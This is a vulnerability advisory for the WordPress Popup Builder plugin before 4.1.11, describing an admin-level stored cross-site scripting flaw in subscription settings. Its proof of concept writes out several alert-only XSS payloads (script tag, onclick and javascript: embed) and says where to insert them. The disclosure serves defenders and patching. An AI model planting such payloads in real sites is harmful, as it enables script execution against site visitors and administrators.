WordPress Plugin Vulnerabilities
Popup Builder < 4.1.11 - Admin+ Stored Cross-Site Scripting
Description
The plugin does not escape and sanitize some settings, which could allow high privilege users to perform Stored Cross-Site Scripting attacks when the unfiltred_html is disallowed
Proof of Concept
Create/edit a subscription, enabled the GDPR options in it and add the following payload in the "confirmation text" settings: v < 4.1.10 - <script>alert(/XSS/)</script> v <= 4.1.10: <input class='js-subs-submit-btn' onclick='javascript:alert(/XSS/)' type='submit' value='Subscribe' style='width:300px;height:40px;background-color:#007fe1 !important;color:#FFFFFF;border-radius:4px !important;border-width:0px !important;border-color:#007fe1 !important;text-transform:none !important;border-style:solid'/> <embed src='javascript:alert(/XSS/)'> (<- will only works in the backend, when updating the Popup and the confirmation text changed) The XSS will be triggered when viewing/previewing the subscription popup (and clicking on the Subscribe button for version >= 4.1.10)
Affects Plugins
Fixed in version 4.1.11
References
Classification
Miscellaneous
Original Researcher
Pritam Dash
Submitter
Pritam Dash
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2022-06-20 (about 2 months ago)
Added
2022-06-20 (about 2 months ago)
Last Updated
2022-06-20 (about 2 months ago)